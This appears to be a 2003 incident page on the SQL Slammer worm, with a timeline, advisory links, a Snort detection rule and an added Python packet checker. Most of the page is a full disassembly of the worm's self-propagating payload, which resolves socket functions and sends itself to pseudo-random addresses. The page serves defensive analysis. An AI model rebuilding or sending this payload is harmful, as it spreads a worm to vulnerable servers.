The word is that a quick fix is to firewall port 1434/UDP traffic, and
reboot the affected SQL servers.
A suggested name for this outbreak is "Bill's Tapeworm".
Last updated 2003-1-25 19:22 CST
----------------------------------------------------
Starting at 11:30pm CST, Jan 24 2003, systems from all over the
internet began sending traffic (apparently) to random destinations. At
5:30am CST, traffic rates are dropping as backbone operators and ISPs
filter UDP traffic to port 1434 (MS-SQL Monitor).
At 6:30am CST, traffic at my site is down to a trickle (relatively
speaking), and CNN has heard about the worm:
http://www.cnn.com/2003/TECH/internet/01/25/internet.attack.ap/index.html
If this is affecting your servers, this might be a good URL to check:
http://support.microsoft.com/default.aspx?scid=kb;EN-US;290211
...or:
http://www.postgresql.org/
...more info:
http://www.eeye.com/html/Research/Flash/AL20030125.html
http://www.securiteam.com/windowsntfocus/5TP0N1F7PS.html
...and...
http://www.kb.cert.org/vuls/id/370308
----------------------------------------------------
Suggested Snort rule to cover this worm (the single rule line is broken with \ continuations):
alert udp $EXTERNAL_NET any -> $HOME_NET 1434 \
(msg:"W32.SQLEXP.Worm propagation"; \
content:"|68 2E 64 6C 6C 68 65 6C 33 32 68 6B 65 72 6E|"; \
content:"|04|"; offset:0; depth:1; reference:cve,CAN-2002-0649; \
reference:cve,CAN-2002-0650; classtype:attempted-user; \
sid:20001; rev:1;)
----------------------------------------------------
A slashdot poster pointed out my error in including portions of the IP
and UDP headers in this dump; the actual data that gets delivered to a
listening socket begins at byte 0x1c (28 decimal) in the following
dump, and *is* 0x04, meaning that this is taking advantage of an old,
known vulnerability. Earlier versions of this file reflected my own
confusion on that point, and I apologize for spreading that
confusion.
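As an added example (not the author's code, and not the worm), the logic of the Snort rule above together with the header-offset correction, applied to a constructed IPv4/UDP frame in Python: the IP and UDP headers are skipped using the IHL field, so the "first byte is 0x04" check lands on the first socket-delivered byte (offset 0x1c here) rather than byte 0 of the capture. Addresses, ports, lengths and padding are constructed; only the signature bytes come from the rule.

```python
"""Check raw IPv4/UDP frames for the W32.SQLEXP.Worm pattern of the Snort rule.
Added example; the sample frames are constructed (TEST-NET addresses, checksums 0)."""
import struct

SQL_MONITOR_PORT = 1434
# Snort content #1: "|68 2E 64 6C 6C 68 65 6C 33 32 68 6B 65 72 6E|" (push opcodes + "kernel32.dll")
PUSH_STRINGS = bytes.fromhex("682E646C6C68656C33326B65726E".replace("6B65726E", "686B65726E"))
# Snort content #2 with offset:0; depth:1 -> first payload byte is 0x04
SSRP_OPCODE = 0x04


def udp_payload(frame: bytes):
    """Return (dst_port, payload) for an IPv4/UDP frame, or None if it is not one.
    Headers are skipped by IHL*4 + 8 bytes: the socket-level data does NOT start at byte 0."""
    if len(frame) < 20 or frame[0] >> 4 != 4:
        return None
    ihl = (frame[0] & 0x0F) * 4
    if frame[9] != 17 or len(frame) < ihl + 8:          # IP protocol 17 = UDP
        return None
    _sport, dport, ulen, _cksum = struct.unpack("!HHHH", frame[ihl:ihl + 8])
    return dport, frame[ihl + 8:ihl + ulen]


def matches_sqlexp_rule(frame: bytes) -> bool:
    """Same conditions as the Snort rule: UDP/1434, payload[0] == 0x04, signature present."""
    parsed = udp_payload(frame)
    if parsed is None:
        return False
    dport, payload = parsed
    return (dport == SQL_MONITOR_PORT
            and payload[:1] == bytes([SSRP_OPCODE])
            and PUSH_STRINGS in payload)


def build_frame(payload: bytes, dport: int = SQL_MONITOR_PORT) -> bytes:
    """Wrap a UDP payload in constructed IPv4 + UDP headers (20 + 8 bytes, checksums left 0)."""
    udp = struct.pack("!HHHH", 2040, dport, 8 + len(payload), 0) + payload
    ip = struct.pack("!BBHHHBBH4s4s", 0x45, 0, 20 + len(udp), 0x8896, 0, 0x6E, 17, 0,
                     bytes([192, 0, 2, 10]), bytes([198, 51, 100, 20]))
    return ip + udp


# Constructed samples: a 376-byte datagram carrying only the signature bytes amid 0x01
# padding (404 bytes on the wire, as in the dump), a normal instance lookup, and the
# signature sent to a port the rule does not cover.
WORMLIKE = build_frame((b"\x04" + b"\x01" * 0x60 + PUSH_STRINGS).ljust(376, b"\x01"))
BENIGN_SSRP = build_frame(b"\x04MSSQLSERVER\x00")
OTHER_PORT = build_frame(b"\x04" + PUSH_STRINGS, dport=1433)
```

Run against a pcap by feeding each IPv4 frame (minus any link-layer header) to `matches_sqlexp_rule`; a hit on a host you do not expect to be patched is the signal to block UDP/1434 and reboot, as the note at the top of this page says.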
----------------------------------------------------
A better disassembly than what follows may be found at:
http://www.boredom.org/~cstone/worm-annotated.txt
Actual overflow code begins at 0x91
Disassembly of the 404 (376 less headers) bytes being sent by affected systems:
----------------------------------------------------
0: 45 inc %ebp
1: 00 01 add %al,(%ecx)
3: 94 xchg %eax,%esp
4: 88 96 00 00 6e 11 mov %dl,0x116e0000(%esi)
a: b2 f0 mov $0xf0,%dl
c: 0c 11 or $0x11,%al
e: 03 04 d1 add (%ecx,%edx,8),%eax
11: ad lods %ds:(%esi),%eax
12: 2f das
13: 10 07 adc %al,(%edi)
15: f8 clc
16: 05 9a 01 80 1d add $0x1d80019a,%eax
1b: 81 04 01 01 01 01 01 addl $0x1010101,(%ecx,%eax,1)
22: 01 01 add %eax,(%ecx)
24: 01 01 add %eax,(%ecx)
26: 01 01 add %eax,(%ecx)
28: 01 01 add %eax,(%ecx)
2a: 01 01 add %eax,(%ecx)
2c: 01 01 add %eax,(%ecx)
2e: 01 01 add %eax,(%ecx)
30: 01 01 add %eax,(%ecx)
32: 01 01 add %eax,(%ecx)
34: 01 01 add %eax,(%ecx)
36: 01 01 add %eax,(%ecx)
38: 01 01 add %eax,(%ecx)
3a: 01 01 add %eax,(%ecx)
3c: 01 01 add %eax,(%ecx)
3e: 01 01 add %eax,(%ecx)
40: 01 01 add %eax,(%ecx)
42: 01 01 add %eax,(%ecx)
44: 01 01 add %eax,(%ecx)
46: 01 01 add %eax,(%ecx)
48: 01 01 add %eax,(%ecx)
4a: 01 01 add %eax,(%ecx)
4c: 01 01 add %eax,(%ecx)
4e: 01 01 add %eax,(%ecx)
50: 01 01 add %eax,(%ecx)
52: 01 01 add %eax,(%ecx)
54: 01 01 add %eax,(%ecx)
56: 01 01 add %eax,(%ecx)
58: 01 01 add %eax,(%ecx)
5a: 01 01 add %eax,(%ecx)
5c: 01 01 add %eax,(%ecx)
5e: 01 01 add %eax,(%ecx)
60: 01 01 add %eax,(%ecx)
62: 01 01 add %eax,(%ecx)
64: 01 01 add %eax,(%ecx)
66: 01 01 add %eax,(%ecx)
68: 01 01 add %eax,(%ecx)
6a: 01 01 add %eax,(%ecx)
6c: 01 01 add %eax,(%ecx)
6e: 01 01 add %eax,(%ecx)
70: 01 01 add %eax,(%ecx)
72: 01 01 add %eax,(%ecx)
74: 01 01 add %eax,(%ecx)
76: 01 01 add %eax,(%ecx)
78: 01 01 add %eax,(%ecx)
7a: 01 01 add %eax,(%ecx)
7c: 01 dc add %ebx,%esp
7e: c9 leave
7f: b0 42 mov $0x42,%al
81: eb 0e jmp 0x91
83: 01 01 add %eax,(%ecx)
85: 01 01 add %eax,(%ecx)
87: 01 01 add %eax,(%ecx)
89: 01 70 ae add %esi,0xffffffae(%eax)
8c: 42 inc %edx
8d: 01 70 ae add %esi,0xffffffae(%eax)
90: 42 inc %edx
91: 90 nop
92: 90 nop
93: 90 nop
94: 90 nop
95: 90 nop
96: 90 nop
97: 90 nop
98: 90 nop
99: 68 dc c9 b0 42 push $0x42b0c9dc
9e: b8 01 01 01 01 mov $0x1010101,%eax
a3: 31 c9 xor %ecx,%ecx
a5: b1 18 mov $0x18,%cl
a7: 50 push %eax
a8: e2 fd loop 0xa7
aa: 35 01 01 01 05 xor $0x5010101,%eax
af: 50 push %eax
b0: 89 e5 mov %esp,%ebp
b2: 51 push %ecx
b3: 68 2e 64 6c 6c push $0x6c6c642e
b8: 68 65 6c 33 32 push $0x32336c65
bd: 68 6b 65 72 6e push $0x6e72656b
c2: 51 push %ecx
c3: 68 6f 75 6e 74 push $0x746e756f
c8: 68 69 63 6b 43 push $0x436b6369
cd: 68 47 65 74 54 push $0x54746547
d2: 66 b9 6c 6c mov $0x6c6c,%cx
d6: 51 push %ecx
d7: 68 33 32 2e 64 push $0x642e3233
dc: 68 77 73 32 5f push $0x5f327377
e1: 66 b9 65 74 mov $0x7465,%cx
e5: 51 push %ecx
e6: 68 73 6f 63 6b push $0x6b636f73
eb: 66 b9 74 6f mov $0x6f74,%cx
ef: 51 push %ecx
f0: 68 73 65 6e 64 push $0x646e6573
f5: be 18 10 ae 42 mov $0x42ae1018,%esi
fa: 8d 45 d4 lea 0xffffffd4(%ebp),%eax
fd: 50 push %eax
fe: ff 16 call *(%esi)
100: 50 push %eax
101: 8d 45 e0 lea 0xffffffe0(%ebp),%eax
104: 50 push %eax
105: 8d 45 f0 lea 0xfffffff0(%ebp),%eax
108: 50 push %eax
109: ff 16 call *(%esi)
10b: 50 push %eax
10c: be 10 10 ae 42 mov $0x42ae1010,%esi
111: 8b 1e mov (%esi),%ebx
113: 8b 03 mov (%ebx),%eax
115: 3d 55 8b ec 51 cmp $0x51ec8b55,%eax
11a: 74 05 je 0x121
11c: be 1c 10 ae 42 mov $0x42ae101c,%esi
121: ff 16 call *(%esi)
123: ff d0 call *%eax
125: 31 c9 xor %ecx,%ecx
127: 51 push %ecx
128: 51 push %ecx
129: 50 push %eax
12a: 81 f1 03 01 04 9b xor $0x9b040103,%ecx
130: 81 f1 01 01 01 01 xor $0x1010101,%ecx
136: 51 push %ecx
137: 8d 45 cc lea 0xffffffcc(%ebp),%eax
13a: 50 push %eax
13b: 8b 45 c0 mov 0xffffffc0(%ebp),%eax
13e: 50 push %eax
13f: ff 16 call *(%esi)
141: 6a 11 push $0x11
143: 6a 02 push $0x2
145: 6a 02 push $0x2
147: ff d0 call *%eax
149: 50 push %eax
14a: 8d 45 c4 lea 0xffffffc4(%ebp),%eax
14d: 50 push %eax
14e: 8b 45 c0 mov 0xffffffc0(%ebp),%eax
151: 50 push %eax
152: ff 16 call *(%esi)
154: 89 c6 mov %eax,%esi
156: 09 db or %ebx,%ebx
158: 81 f3 3c 61 d9 ff xor $0xffd9613c,%ebx
15e: 8b 45 b4 mov 0xffffffb4(%ebp),%eax
161: 8d 0c 40 lea (%eax,%eax,2),%ecx
164: 8d 14 88 lea (%eax,%ecx,4),%edx
167: c1 e2 04 shl $0x4,%edx
16a: 01 c2 add %eax,%edx
16c: c1 e2 08 shl $0x8,%edx
16f: 29 c2 sub %eax,%edx
171: 8d 04 90 lea (%eax,%edx,4),%eax
174: 01 d8 add %ebx,%eax
176: 89 45 b4 mov %eax,0xffffffb4(%ebp)
179: 6a 10 push $0x10
17b: 8d 45 b0 lea 0xffffffb0(%ebp),%eax
17e: 50 push %eax
17f: 31 c9 xor %ecx,%ecx
181: 51 push %ecx
182: 66 81 f1 78 01 xor $0x178,%cx
187: 51 push %ecx
188: 8d 45 03 lea 0x3(%ebp),%eax
18b: 50 push %eax
18c: 8b 45 ac mov 0xffffffac(%ebp),%eax
18f: 50 push %eax
190: ff d6 call *%esi
192: eb ca jmp 0x15e